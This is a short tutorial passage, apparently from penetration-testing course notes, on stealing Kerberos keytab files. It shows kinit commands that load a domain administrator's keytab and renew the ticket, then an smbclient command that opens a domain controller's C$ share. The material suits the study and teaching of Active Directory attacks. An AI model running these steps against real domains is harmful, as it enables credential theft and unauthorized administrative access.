Stealing Keytab files

If we discover keytab files, we can use them to authenticate to other systems as the principal they hold, here the domain administrator: a keytab stores the principal's long-term key, so kinit can obtain a TGT from it with no password prompt. To load the keytab from a script running as root, we use the following syntax.

kinit [email protected] -k -t /tmp/administrator.keytab

Renew the ticket without entering a password:

kinit -R

Now that our root user holds a ticket obtained from the keytab, we can authenticate as the domain admin and reach any resource that account can access. Let's attempt to open the domain controller's C$ share, using Kerberos authentication (-k) rather than a password.

smbclient -k -U "CORP1.COM\administrator" //DC01.CORP1.COM/C$
